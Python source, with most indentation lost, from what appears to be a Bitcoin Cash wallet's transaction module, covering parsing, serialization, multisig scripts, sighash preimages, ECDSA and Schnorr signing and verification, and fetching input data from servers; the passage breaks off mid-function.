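# Editor's sketch (hypothetical helper, not used elsewhere): the length and
# prefix/suffix checks above classify standard output scripts. A 25-byte
# OP_DUP OP_HASH160 <20-byte hash> OP_EQUALVERIFY OP_CHECKSIG script (here with
# a dummy all-zero hash) is recognised as pay-to-pubkey-hash.
def _example_classify_p2pkh_script():
    script = P2PKH_prefix + bytes(20) + P2PKH_suffix
    kind, addr = get_address_from_output_script(script)
    return kind == TYPE_ADDRESS and isinstance(addr, Address)  # True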
def parse_input(vds):
d = {}
prevout_hash = hash_encode(vds.read_bytes(32))
prevout_n = vds.read_uint32()
scriptSig = vds.read_bytes(vds.read_compact_size())
sequence = vds.read_uint32()
d['prevout_hash'] = prevout_hash
d['prevout_n'] = prevout_n
d['sequence'] = sequence
d['address'] = UnknownAddress()
if prevout_hash == '00'*32:
d['type'] = 'coinbase'
d['scriptSig'] = bh2u(scriptSig)
else:
d['x_pubkeys'] = []
d['pubkeys'] = []
d['signatures'] = {}
d['address'] = None
d['type'] = 'unknown'
d['num_sig'] = 0
d['scriptSig'] = bh2u(scriptSig)
try:
parse_scriptSig(d, scriptSig)
except Exception as e:
print_error('{}: Failed to parse tx input {}:{}, probably a p2sh (non multisig?). Exception was: {}'.format(__name__, prevout_hash, prevout_n, repr(e)))
# that whole heuristic codepath is fragile; just ignore it when it dies.
# failing tx examples:
# 1c671eb25a20aaff28b2fa4254003c201155b54c73ac7cf9c309d835deed85ee
# 08e1026eaf044127d7103415570afd564dfac3131d7a5e4b645f591cd349bb2c
# override these once more just to make sure
d['address'] = UnknownAddress()
d['type'] = 'unknown'
if not Transaction.is_txin_complete(d):
del d['scriptSig']
d['value'] = vds.read_uint64()
return d
def parse_output(vds, i):
d = {}
d['value'] = vds.read_int64()
scriptPubKey = vds.read_bytes(vds.read_compact_size())
d['type'], d['address'] = get_address_from_output_script(scriptPubKey)
d['scriptPubKey'] = bh2u(scriptPubKey)
d['prevout_n'] = i
return d
def deserialize(raw):
vds = BCDataStream()
vds.write(bfh(raw))
d = {}
start = vds.read_cursor
d['version'] = vds.read_int32()
n_vin = vds.read_compact_size()
d['inputs'] = [parse_input(vds) for i in range(n_vin)]
n_vout = vds.read_compact_size()
d['outputs'] = [parse_output(vds, i) for i in range(n_vout)]
d['lockTime'] = vds.read_uint32()
if vds.can_read_more():
raise SerializationError('extra junk at the end')
return d
# pay & redeem scripts
def multisig_script(public_keys, m):
n = len(public_keys)
assert n <= 15
assert m <= n
op_m = format(opcodes.OP_1 + m - 1, 'x')
op_n = format(opcodes.OP_1 + n - 1, 'x')
keylist = [op_push(len(k)//2) + k for k in public_keys]
return op_m + ''.join(keylist) + op_n + 'ae'
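# Editor's sketch (hypothetical helper, not used elsewhere): a 2-of-3 redeem
# script built from three dummy compressed pubkeys (33 bytes / 66 hex chars
# each). The result starts with OP_2 ('52'), pushes the three keys, then OP_3
# ('53') and OP_CHECKMULTISIG ('ae').
def _example_2of3_redeem_script():
    dummy_pubkeys = ['02' + '11' * 32, '02' + '22' * 32, '02' + '33' * 32]
    return multisig_script(dummy_pubkeys, 2)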
class Transaction:
SIGHASH_FORKID = 0x40 # do not use this; deprecated
FORKID = 0x000000 # do not use this; deprecated
def __str__(self):
if self.raw is None:
self.raw = self.serialize()
return self.raw
def __init__(self, raw, sign_schnorr=False):
if raw is None:
self.raw = None
elif isinstance(raw, str):
self.raw = raw.strip() if raw else None
elif isinstance(raw, dict):
self.raw = raw['hex']
else:
raise BaseException("cannot initialize transaction", raw)
self._inputs = None
self._outputs = None
self.locktime = 0
self.version = 1
self._sign_schnorr = sign_schnorr
# attribute used by HW wallets to tell the hw keystore about any outputs
# in the tx that are to self (change), etc. See wallet.py add_hw_info
# which writes to this dict and the various hw wallet plugins which
# read this dict.
self.output_info = dict()
# Ephemeral meta-data used internally to keep track of interesting
# things. This is currently written-to by coinchooser to tell UI code
# about 'dust_to_fee', which is change that's too small to go to change
# outputs (below dust threshold) and needed to go to the fee.
#
# It is also used to store the 'fetched_inputs' which are asynchronously
# retrieved inputs (by retrieving prevout_hash tx's), see
#`fetch_input_data`.
#
# Values in this dict are advisory only and may or may not always be
# there!
self.ephemeral = dict()
def set_sign_schnorr(self, b):
self._sign_schnorr = b
def update(self, raw):
self.raw = raw
self._inputs = None
self.deserialize()
def inputs(self):
if self._inputs is None:
self.deserialize()
return self._inputs
def outputs(self):
if self._outputs is None:
self.deserialize()
return self._outputs
@classmethod
def get_sorted_pubkeys(self, txin):
# sort pubkeys and x_pubkeys, using the order of pubkeys
x_pubkeys = txin['x_pubkeys']
pubkeys = txin.get('pubkeys')
if pubkeys is None:
pubkeys = [xpubkey_to_pubkey(x) for x in x_pubkeys]
pubkeys, x_pubkeys = zip(*sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = pubkeys = list(pubkeys)
txin['x_pubkeys'] = x_pubkeys = list(x_pubkeys)
return pubkeys, x_pubkeys
def update_signatures(self, signatures):
"""Add new signatures to a transaction
`signatures` is expected to be a list of hex encoded sig strings with
*no* sighash byte at the end (implicitly always 0x41 (SIGHASH_FORKID|SIGHASH_ALL);
will be added by this function).
signatures[i] is intended for self._inputs[i].
The signature will be matched with the appropriate pubkey automatically
in the case of multisignature wallets.
This function is used by the Trezor, KeepKey, etc to update the
        transaction with signatures from the device.
Note this function supports both Schnorr and ECDSA signatures, but as
yet no hardware wallets are signing Schnorr.
"""
if self.is_complete():
return
if not isinstance(signatures, (tuple, list)):
raise Exception('API changed: update_signatures expects a list.')
if len(self.inputs()) != len(signatures):
raise Exception('expected {} signatures; got {}'.format(len(self.inputs()), len(signatures)))
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
sig = signatures[i]
if not isinstance(sig, str):
raise ValueError("sig was bytes, expected string")
# sig_final is the signature with the sighashbyte at the end (0x41)
sig_final = sig + '41'
if sig_final in txin.get('signatures'):
# skip if we already have this signature
continue
pre_hash = Hash(bfh(self.serialize_preimage(i)))
sig_bytes = bfh(sig)
added = False
reason = []
for j, pubkey in enumerate(pubkeys):
# see which pubkey matches this sig (in non-multisig only 1 pubkey, in multisig may be multiple pubkeys)
if self.verify_signature(bfh(pubkey), sig_bytes, pre_hash, reason):
print_error("adding sig", i, j, pubkey, sig_final)
self._inputs[i]['signatures'][j] = sig_final
added = True
if not added:
resn = ', '.join(reversed(reason)) if reason else ''
print_error("failed to add signature {} for any pubkey for reason(s): '{}' ; pubkey(s) / sig / pre_hash = ".format(i, resn),
pubkeys, '/', sig, '/', bh2u(pre_hash))
# redo raw
self.raw = self.serialize()
def is_schnorr_signed(self, input_idx):
''' Return True IFF any of the signatures for a particular input
        are Schnorr signatures (a Schnorr signature is always 64 bytes, plus a 1-byte sighash flag) '''
if (isinstance(self._inputs, (list, tuple))
and input_idx < len(self._inputs)
and self._inputs[input_idx]):
# Schnorr sigs are always 64 bytes. However the sig has a hash byte
# at the end, so that's 65. Plus we are hex encoded, so 65*2=130
return any(isinstance(sig, (str, bytes)) and len(sig) == 130
for sig in self._inputs[input_idx].get('signatures', []))
return False
def deserialize(self):
if self.raw is None:
return
if self._inputs is not None:
return
d = deserialize(self.raw)
self.invalidate_common_sighash_cache()
self._inputs = d['inputs']
self._outputs = [(x['type'], x['address'], x['value']) for x in d['outputs']]
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in self._outputs)
self.locktime = d['lockTime']
self.version = d['version']
return d
@classmethod
def from_io(klass, inputs, outputs, locktime=0, sign_schnorr=False):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self = klass(None)
self._inputs = inputs
self._outputs = outputs.copy()
self.locktime = locktime
self.set_sign_schnorr(sign_schnorr)
return self
@classmethod
def pay_script(self, output):
return output.to_script().hex()
@classmethod
def estimate_pubkey_size_from_x_pubkey(cls, x_pubkey):
try:
if x_pubkey[0:2] in ['02', '03']: # compressed pubkey
return 0x21
elif x_pubkey[0:2] == '04': # uncompressed pubkey
return 0x41
elif x_pubkey[0:2] == 'ff': # bip32 extended pubkey
return 0x21
elif x_pubkey[0:2] == 'fe': # old electrum extended pubkey
return 0x41
except Exception as e:
pass
return 0x21 # just guess it is compressed
@classmethod
def estimate_pubkey_size_for_txin(cls, txin):
pubkeys = txin.get('pubkeys', [])
x_pubkeys = txin.get('x_pubkeys', [])
if pubkeys and len(pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(pubkeys[0])
elif x_pubkeys and len(x_pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(x_pubkeys[0])
else:
return 0x21 # just guess it is compressed
@classmethod
def get_siglist(self, txin, estimate_size=False, sign_schnorr=False):
# if we have enough signatures, we use the actual pubkeys
# otherwise, use extended pubkeys (with bip32 derivation)
num_sig = txin.get('num_sig', 1)
if estimate_size:
pubkey_size = self.estimate_pubkey_size_for_txin(txin)
pk_list = ["00" * pubkey_size] * len(txin.get('x_pubkeys', [None]))
# we assume that signature will be 0x48 bytes long if ECDSA, 0x41 if Schnorr
if sign_schnorr:
siglen = 0x41
else:
siglen = 0x48
sig_list = [ "00" * siglen ] * num_sig
else:
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
is_complete = len(signatures) == num_sig
if is_complete:
pk_list = pubkeys
sig_list = signatures
else:
pk_list = x_pubkeys
sig_list = [sig if sig else NO_SIGNATURE for sig in x_signatures]
return pk_list, sig_list
@classmethod
def input_script(self, txin, estimate_size=False, sign_schnorr=False):
# For already-complete transactions, scriptSig will be set and we prefer
# to use it verbatim in order to get an exact reproduction (including
# malleated push opcodes, etc.).
scriptSig = txin.get('scriptSig', None)
if scriptSig is not None:
return scriptSig
# For partially-signed inputs, or freshly signed transactions, the
# scriptSig will be missing and so we construct it from pieces.
_type = txin['type']
if _type == 'coinbase':
raise RuntimeError('Attempted to serialize coinbase with missing scriptSig')
pubkeys, sig_list = self.get_siglist(txin, estimate_size, sign_schnorr=sign_schnorr)
script = ''.join(push_script(x) for x in sig_list)
if _type == 'p2pk':
pass
elif _type == 'p2sh':
# put op_0 before script
script = '00' + script
redeem_script = multisig_script(pubkeys, txin['num_sig'])
script += push_script(redeem_script)
elif _type == 'p2pkh':
script += push_script(pubkeys[0])
elif _type == 'unknown':
raise RuntimeError('Cannot serialize unknown input with missing scriptSig')
return script
@classmethod
def is_txin_complete(cls, txin):
if txin['type'] == 'coinbase':
return True
num_sig = txin.get('num_sig', 1)
if num_sig == 0:
return True
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
return len(signatures) == num_sig
@classmethod
def get_preimage_script(self, txin):
_type = txin['type']
if _type == 'p2pkh':
return txin['address'].to_script().hex()
elif _type == 'p2sh':
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
return multisig_script(pubkeys, txin['num_sig'])
elif _type == 'p2pk':
pubkey = txin['pubkeys'][0]
return public_key_to_p2pk_script(pubkey)
elif _type == 'unknown':
# this approach enables most P2SH smart contracts (but take care if using OP_CODESEPARATOR)
return txin['scriptCode']
else:
raise RuntimeError('Unknown txin type', _type)
@classmethod
def serialize_outpoint(self, txin):
return bh2u(bfh(txin['prevout_hash'])[::-1]) + int_to_hex(txin['prevout_n'], 4)
@classmethod
def serialize_input(self, txin, script, estimate_size=False):
# Prev hash and index
s = self.serialize_outpoint(txin)
# Script length, script, sequence
s += var_int(len(script)//2)
s += script
s += int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
# offline signing needs to know the input value
if ('value' in txin
and txin.get('scriptSig') is None
and not (estimate_size or self.is_txin_complete(txin))):
s += int_to_hex(txin['value'], 8)
return s
def BIP_LI01_sort(self):
# See https://github.com/kristovatlas/rfc/blob/master/bips/bip-li01.mediawiki
self._inputs.sort(key = lambda i: (i['prevout_hash'], i['prevout_n']))
self._outputs.sort(key = lambda o: (o[2], self.pay_script(o[1])))
def serialize_output(self, output):
output_type, addr, amount = output
s = int_to_hex(amount, 8)
script = self.pay_script(addr)
s += var_int(len(script)//2)
s += script
return s
@classmethod
def nHashType(cls):
'''Hash type in hex.'''
warnings.warn("warning: deprecated tx.nHashType()", FutureWarning, stacklevel=2)
return 0x01 | (cls.SIGHASH_FORKID + (cls.FORKID << 8))
def invalidate_common_sighash_cache(self):
''' Call this to invalidate the cached common sighash (computed by
`calc_common_sighash` below).
        This function is for advanced usage of this class where the caller
has mutated the transaction after computing its signatures and would
like to explicitly delete the cached common sighash. See
`calc_common_sighash` below. '''
try: del self._cached_sighash_tup
except AttributeError: pass
def calc_common_sighash(self, use_cache=False):
""" Calculate the common sighash components that are used by
transaction signatures. If `use_cache` enabled then this will return
already-computed values from the `._cached_sighash_tup` attribute, or
compute them if necessary (and then store).
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
        Returns three 32-byte long bytes objects: (hashPrevouts, hashSequence, hashOutputs).
Warning: If you modify non-signature parts of the transaction
afterwards, this cache will be wrong! """
inputs = self.inputs()
outputs = self.outputs()
meta = (len(inputs), len(outputs))
if use_cache:
try:
cmeta, res = self._cached_sighash_tup
except AttributeError:
pass
else:
# minimal heuristic check to detect bad cached value
if cmeta == meta:
# cache hit and heuristic check ok
return res
else:
del cmeta, res, self._cached_sighash_tup
hashPrevouts = Hash(bfh(''.join(self.serialize_outpoint(txin) for txin in inputs)))
hashSequence = Hash(bfh(''.join(int_to_hex(txin.get('sequence', 0xffffffff - 1), 4) for txin in inputs)))
hashOutputs = Hash(bfh(''.join(self.serialize_output(o) for o in outputs)))
res = hashPrevouts, hashSequence, hashOutputs
        # cache the resulting value, along with some minimal metadata to defensively
# program against cache invalidation (due to class mutation).
self._cached_sighash_tup = meta, res
return res
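    # Minimal usage sketch (illustrative only; `raw_hex` and `keypairs` are
    # hypothetical values supplied by the caller). Passing use_cache=True while
    # signing lets every input reuse the sighash components computed above:
    #
    #   tx = Transaction(raw_hex)
    #   tx.deserialize()
    #   tx.sign(keypairs, use_cache=True)
    #
    # If outputs or locktime are mutated afterwards, call
    # invalidate_common_sighash_cache() before signing again.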
def serialize_preimage(self, i, nHashType=0x00000041, use_cache = False):
""" See `.calc_common_sighash` for explanation of use_cache feature """
if not (nHashType & 0xff) in [0x41, 0xc1]:
raise ValueError("other hashtypes not supported; submit a PR to fix this!")
anyonecanpay = True if (nHashType & 0x80) > 0 else False
nVersion = int_to_hex(self.version, 4)
nHashType = int_to_hex(nHashType, 4)
nLocktime = int_to_hex(self.locktime, 4)
txin = self.inputs()[i]
outpoint = self.serialize_outpoint(txin)
preimage_script = self.get_preimage_script(txin)
scriptCode = var_int(len(preimage_script) // 2) + preimage_script
try:
amount = int_to_hex(txin['value'], 8)
except KeyError:
raise InputValueMissing
nSequence = int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
hashPrevouts, hashSequence, hashOutputs = self.calc_common_sighash(use_cache = use_cache)
if anyonecanpay:
hashPrevouts = "0000000000000000000000000000000000000000000000000000000000000000"
hashSequence = "0000000000000000000000000000000000000000000000000000000000000000"
else:
hashPrevouts = bh2u(hashPrevouts)
hashSequence = bh2u(hashSequence)
preimage = nVersion + hashPrevouts + hashSequence + outpoint + scriptCode + amount + nSequence + bh2u(hashOutputs) + nLocktime + nHashType
return preimage
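    # For reference, the preimage assembled above follows the BCH (BIP143-style)
    # replay-protected layout, concatenated in this order:
    #   nVersion | hashPrevouts | hashSequence | outpoint | scriptCode |
    #   amount | nSequence | hashOutputs | nLocktime | nHashType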
def serialize(self, estimate_size=False):
nVersion = int_to_hex(self.version, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txins = var_int(len(inputs)) + ''.join(self.serialize_input(txin, self.input_script(txin, estimate_size, self._sign_schnorr), estimate_size) for txin in inputs)
txouts = var_int(len(outputs)) + ''.join(self.serialize_output(o) for o in outputs)
return nVersion + txins + txouts + nLocktime
def hash(self):
warnings.warn("warning: deprecated tx.hash()", FutureWarning, stacklevel=2)
return self.txid()
def txid(self):
if not self.is_complete():
return None
ser = self.serialize()
return self._txid(ser)
def txid_fast(self):
''' Returns the txid by immediately calculating it from self.raw,
which is faster than calling txid() which does a full re-serialize
each time. Note this should only be used for tx's that you KNOW are
complete and that don't contain our funny serialization hacks.
(The is_complete check is also not performed here because that
potentially can lead to unwanted tx deserialization). '''
if self.raw:
return self._txid(self.raw)
return self.txid()
@staticmethod
def _txid(raw_hex : str) -> str:
return bh2u(Hash(bfh(raw_hex))[::-1])
def add_inputs(self, inputs):
self._inputs.extend(inputs)
self.raw = None
def add_outputs(self, outputs):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self._outputs.extend(outputs)
self.raw = None
def input_value(self):
''' Will return the sum of all input values, if the input values
are known (may consult self.fetched_inputs() to get a better idea of
possible input values). Will raise InputValueMissing if input values
are missing. '''
try:
return sum(x['value'] for x in (self.fetched_inputs() or self.inputs()))
except (KeyError, TypeError, ValueError) as e:
raise InputValueMissing from e
def output_value(self):
return sum(val for tp, addr, val in self.outputs())
def get_fee(self):
        ''' Try to calculate the fee based on the input data, and return it as
        satoshis (int). Can raise InputValueMissing on tx's where fee data is
        missing, so client code should catch that. '''
# first, check if coinbase; coinbase tx always has 0 fee
if self.inputs() and self._inputs[0].get('type') == 'coinbase':
return 0
# otherwise just sum up all values - may raise InputValueMissing
return self.input_value() - self.output_value()
@profiler
def estimated_size(self):
'''Return an estimated tx size in bytes.'''
return (len(self.serialize(True)) // 2 if not self.is_complete() or self.raw is None
else len(self.raw) // 2) # ASCII hex string
@classmethod
def estimated_input_size(self, txin, sign_schnorr=False):
        '''Return an estimate of the serialized input size in bytes.'''
script = self.input_script(txin, True, sign_schnorr=sign_schnorr)
return len(self.serialize_input(txin, script, True)) // 2 # ASCII hex string
def signature_count(self):
r = 0
s = 0
for txin in self.inputs():
if txin['type'] == 'coinbase':
continue
signatures = list(filter(None, txin.get('signatures',[])))
s += len(signatures)
r += txin.get('num_sig', -1)
return s, r
def is_complete(self):
s, r = self.signature_count()
return r == s
@staticmethod
def verify_signature(pubkey, sig, msghash, reason=None):
''' Given a pubkey (bytes), signature (bytes -- without sighash byte),
and a sha256d message digest, returns True iff the signature is good
for the given public key, False otherwise. Does not raise normally
unless given bad or garbage arguments.
Optional arg 'reason' should be a list which will have a string pushed
at the front (failure reason) on False return. '''
if (any(not arg or not isinstance(arg, bytes) for arg in (pubkey, sig, msghash))
or len(msghash) != 32):
raise ValueError('bad arguments to verify_signature')
if len(sig) == 64:
# Schnorr signatures are always exactly 64 bytes
return schnorr.verify(pubkey, sig, msghash)
else:
from ecdsa import BadSignatureError, BadDigestError
from ecdsa.der import UnexpectedDER
# ECDSA signature
try:
pubkey_point = ser_to_point(pubkey)
vk = MyVerifyingKey.from_public_point(pubkey_point, curve=SECP256k1)
if vk.verify_digest(sig, msghash, sigdecode = ecdsa.util.sigdecode_der):
return True
except (AssertionError, ValueError, TypeError,
BadSignatureError, BadDigestError, UnexpectedDER) as e:
# ser_to_point will fail if pubkey is off-curve, infinity, or garbage.
# verify_digest may also raise BadDigestError and BadSignatureError
if isinstance(reason, list):
reason.insert(0, repr(e))
except BaseException as e:
print_error("[Transaction.verify_signature] unexpected exception", repr(e))
if isinstance(reason, list):
reason.insert(0, repr(e))
return False
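    # Usage sketch (all values hypothetical): the signature length selects the
    # scheme -- exactly 64 bytes is treated as Schnorr, anything else as
    # DER-encoded ECDSA:
    #
    #   reason = []
    #   ok = Transaction.verify_signature(pubkey_bytes, sig_bytes,
    #                                     Hash(preimage_bytes), reason=reason)
    #   if not ok:
    #       print_error("bad signature:", reason and reason[0])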
@staticmethod
def _ecdsa_sign(sec, pre_hash):
pkey = regenerate_key(sec)
secexp = pkey.secret
private_key = MySigningKey.from_secret_exponent(secexp, curve = SECP256k1)
public_key = private_key.get_verifying_key()
sig = private_key.sign_digest_deterministic(pre_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_der)
assert public_key.verify_digest(sig, pre_hash, sigdecode = ecdsa.util.sigdecode_der)
return sig
@staticmethod
def _schnorr_sign(pubkey, sec, pre_hash):
pubkey = bytes.fromhex(pubkey)
sig = schnorr.sign(sec, pre_hash)
assert schnorr.verify(pubkey, sig, pre_hash) # verify what we just signed
return sig
def sign(self, keypairs, *, use_cache=False, anyonecanpay=False):
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
for j, (pubkey, x_pubkey) in enumerate(zip(pubkeys, x_pubkeys)):
if self.is_txin_complete(txin):
# txin is complete
break
if pubkey in keypairs:
_pubkey = pubkey
kname = 'pubkey'
elif x_pubkey in keypairs:
_pubkey = x_pubkey
kname = 'x_pubkey'
else:
continue
print_error(f"adding signature for input#{i} sig#{j}; {kname}: {_pubkey} schnorr: {self._sign_schnorr}")
sec, compressed = keypairs.get(_pubkey)
self._sign_txin(i, j, sec, compressed, use_cache=use_cache, anyonecanpay=anyonecanpay)
print_error("is_complete", self.is_complete())
self.raw = self.serialize()
def _sign_txin(self, i, j, sec, compressed, *, use_cache=False, anyonecanpay=False):
'''Note: precondition is self._inputs is valid (ie: tx is already deserialized)'''
pubkey = public_key_from_private_key(sec, compressed)
# add signature
nHashType = 0x00000041 # hardcoded, perhaps should be taken from unsigned input dict
if anyonecanpay:
nHashType += 0x00000080
        pre_hash = Hash(bfh(self.serialize_preimage(i, nHashType, use_cache=use_cache)))
if self._sign_schnorr:
sig = self._schnorr_sign(pubkey, sec, pre_hash)
else:
sig = self._ecdsa_sign(sec, pre_hash)
reason = []
if not self.verify_signature(bfh(pubkey), sig, pre_hash, reason=reason):
print_error(f"Signature verification failed for input#{i} sig#{j}, reason: {str(reason)}")
return None
txin = self._inputs[i]
txin['signatures'][j] = bh2u(sig + bytes((nHashType & 0xff,)))
txin['pubkeys'][j] = pubkey # needed for fd keys
return txin
def get_outputs(self):
"""convert pubkeys to addresses"""
o = []
for type, addr, v in self.outputs():
o.append((addr,v)) # consider using yield (addr, v)
return o
def get_output_addresses(self):
return [addr for addr, val in self.get_outputs()]
def has_address(self, addr):
return (addr in self.get_output_addresses()) or (addr in (tx.get("address") for tx in self.inputs()))
def is_final(self):
return not any([x.get('sequence', 0xffffffff - 1) < 0xffffffff - 1
for x in self.inputs()])
def as_dict(self):
if self.raw is None:
self.raw = self.serialize()
self.deserialize()
out = {
'hex': self.raw,
'complete': self.is_complete(),
'final': self.is_final(),
}
return out
# This cache stores foreign (non-wallet) tx's we fetched from the network
# for the purposes of the "fetch_input_data" mechanism. Its max size has
# been thoughtfully calibrated to provide a decent tradeoff between
# memory consumption and UX.
#
    # Even in aggressive/pathological cases this cache won't ever exceed
# 100MB even when full. [see ExpiringCache.size_bytes() to test it].
# This is acceptable considering this is Python + Qt and it eats memory
# anyway.. and also this is 2019 ;). Note that all tx's in this cache
# are in the non-deserialized state (hex encoded bytes only) as a memory
# savings optimization. Please maintain that invariant if you modify this
# code, otherwise the cache may grow to 10x memory consumption if you
# put deserialized tx's in here.
_fetched_tx_cache = ExpiringCache(maxlen=1000, name="TransactionFetchCache")
def fetch_input_data(self, wallet, done_callback=None, done_args=tuple(),
prog_callback=None, *, force=False, use_network=True):
'''
Fetch all input data and put it in the 'ephemeral' dictionary, under
'fetched_inputs'. This call potentially initiates fetching of
prevout_hash transactions from the network for all inputs to this tx.
The fetched data is basically used for the Transaction dialog to be able
to display fee, actual address, and amount (value) for tx inputs.
`wallet` should ideally have a network object, but this function still
will work and is still useful if it does not.
`done_callback` is called with `done_args` (only if True was returned),
upon completion. Note that done_callback won't be called if this function
returns False. Also note that done_callback runs in a non-main thread
context and as such, if you want to do GUI work from within it, use
the appropriate Qt signal/slot mechanism to dispatch work to the GUI.
`prog_callback`, if specified, is called periodically to indicate
progress after inputs are retrieved, and it is passed a single arg,
"percent" (eg: 5.1, 10.3, 26.3, 76.1, etc) to indicate percent progress.
Note 1: Results (fetched transactions) are cached, so subsequent
calls to this function for the same transaction are cheap.
Note 2: Multiple, rapid calls to this function will cause the previous
asynchronous fetch operation (if active) to be canceled and only the
latest call will result in the invocation of the done_callback if/when
it completes.
'''
if not self._inputs:
return False
if force:
# forced-run -- start with empty list
inps = []
else:
# may be a new list or list that was already in dict
inps = self.fetched_inputs(require_complete = True)
if len(self._inputs) == len(inps):
# we already have results, don't do anything.
return False
eph = self.ephemeral
eph['fetched_inputs'] = inps = inps.copy() # paranoia: in case another thread is running on this list
# Lazy imports to keep this functionality very self-contained
# These modules are always available so no need to globally import them.
import threading
import queue
import time
from copy import deepcopy
from collections import defaultdict
t0 = time.time()
t = None
cls = __class__
self_txid = self.txid()
def doIt():
'''
This function is seemingly complex, but it's really conceptually
simple:
1. Fetch all prevouts either from cache (wallet or global tx_cache)
2. Or, if they aren't in either cache, then we will asynchronously
queue the raw tx gets to the network in parallel, across *all*
our connected servers. This is very fast, and spreads the load
around.
Tested with a huge tx of 600+ inputs all coming from different
prevout_hashes on mainnet, and it's super fast:
cd8fcc8ad75267ff9ad314e770a66a9e871be7882b7c05a7e5271c46bfca98bc '''
last_prog = -9999.0
need_dl_txids = defaultdict(list) # the dict of txids we will need to download (wasn't in cache)
def prog(i, prog_total=100):
''' notify interested code about progress '''
nonlocal last_prog
if prog_callback:
prog = ((i+1)*100.0)/prog_total
if prog - last_prog > 5.0:
prog_callback(prog)
last_prog = prog
while eph.get('_fetch') == t and len(inps) < len(self._inputs):
i = len(inps)
inp = deepcopy(self._inputs[i])
typ, prevout_hash, n, addr, value = inp.get('type'), inp.get('prevout_hash'), inp.get('prevout_n'), inp.get('address'), inp.get('value')
if not prevout_hash or n is None:
raise RuntimeError('Missing prevout_hash and/or prevout_n')
if typ != 'coinbase' and (not isinstance(addr, Address) or value is None):
tx = cls.tx_cache_get(prevout_hash) or wallet.transactions.get(prevout_hash)
if tx:
# Tx was in cache or wallet.transactions, proceed
# note that the tx here should be in the "not
# deserialized" state
if tx.raw:
# Note we deserialize a *copy* of the tx so as to
# save memory. We do not want to deserialize the
# cached tx because if we do so, the cache will
# contain a deserialized tx which will take up
# several times the memory when deserialized due to
# Python's memory use being less efficient than the
# binary-only raw bytes. So if you modify this code
# do bear that in mind.
tx = Transaction(tx.raw)
try:
tx.deserialize()
# The below txid check is commented-out as
# we trust wallet tx's and the network
# tx's that fail this check are never
# put in cache anyway.
#txid = tx._txid(tx.raw)
#if txid != prevout_hash: # sanity check
# print_error("fetch_input_data: cached prevout_hash {} != tx.txid() {}, ignoring.".format(prevout_hash, txid))
except Exception as e:
print_error("fetch_input_data: WARNING failed to deserialize {}: {}".format(prevout_hash, repr(e)))
tx = None
else:
tx = None
print_error("fetch_input_data: WARNING cached tx lacked any 'raw' bytes for {}".format(prevout_hash))
# now, examine the deserialized tx, if it's still good
if tx:
if n < len(tx.outputs()):
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inp['value'] = value
inp['address'] = addr
print_error("fetch_input_data: fetched cached", i, addr, value)
else:
print_error("fetch_input_data: ** FIXME ** should never happen -- n={} >= len(tx.outputs())={} for prevout {}".format(n, len(tx.outputs()), prevout_hash))
else:
# tx was not in cache or wallet.transactions, mark
# it for download below (this branch can also execute
# in the unlikely case where there was an error above)
need_dl_txids[prevout_hash].append((i, n)) # remember the input# as well as the prevout_n
inps.append(inp) # append either cached result or as-yet-incomplete copy of _inputs[i]
# Now, download the tx's we didn't find above if network is available
            # and the caller said it's ok to go out to the network.. otherwise just return
# what we have
if use_network and eph.get('_fetch') == t and wallet.network:
callback_funcs_to_cancel = set()
try: # the whole point of this try block is the `finally` way below...
prog(-1) # tell interested code that progress is now 0%
# Next, queue the transaction.get requests, spreading them
# out randomly over the connected interfaces
q = queue.Queue()
q_ct = 0
bad_txids = set()
def put_in_queue_and_cache(r):
''' we cache the results directly in the network callback
as even if the user cancels the operation, we would like
to save the returned tx in our cache, since we did the
work to retrieve it anyway. '''
q.put(r) # put the result in the queue no matter what it is
txid = ''
try:
# Below will raise if response was 'error' or
# otherwise invalid. Note: for performance reasons
# we don't validate the tx here or deserialize it as
# this function runs in the network thread and we
# don't want to eat up that thread's CPU time
# needlessly. Also note the cache doesn't store
                            # deserialized tx's so as to save memory. We
# always deserialize a copy when reading the cache.
tx = Transaction(r['result'])
txid = r['params'][0]
assert txid == cls._txid(tx.raw), "txid-is-sane-check" # protection against phony responses
cls.tx_cache_put(tx=tx, txid=txid) # save tx to cache here
except Exception as e:
# response was not valid, ignore (don't cache)
if txid: # txid may be '' if KeyError from r['result'] above
bad_txids.add(txid)
print_error("fetch_input_data: put_in_queue_and_cache fail for txid:", txid, repr(e))
for txid, l in need_dl_txids.items():
wallet.network.queue_request('blockchain.transaction.get', [txid],
interface='random',
callback=put_in_queue_and_cache)
callback_funcs_to_cancel.add(put_in_queue_and_cache)
q_ct += 1
def get_bh():
if eph.get('block_height'):
return False
lh = wallet.network.get_server_height() or wallet.get_local_height()
def got_tx_info(r):
q.put('block_height') # indicate to other thread we got the block_height reply from network
try:
confs = r.get('result').get('confirmations', 0) # will raise of error reply
if confs and lh:
# the whole point.. was to get this piece of data.. the block_height
eph['block_height'] = bh = lh - confs + 1
print_error('fetch_input_data: got tx block height', bh)
else:
print_error('fetch_input_data: tx block height could not be determined')
except Exception as e:
print_error('fetch_input_data: get_bh fail:', str(e), r)
if self_txid:
wallet.network.queue_request('blockchain.transaction.get', [self_txid,True],
interface=None, callback=got_tx_info)
callback_funcs_to_cancel.add(got_tx_info)
return True
if get_bh():
q_ct += 1
class ErrorResp(Exception):
pass
for i in range(q_ct):
# now, read the q back, with a 10 second timeout, and
# populate the inputs
try:
r = q.get(timeout=10)
if eph.get('_fetch') != t:
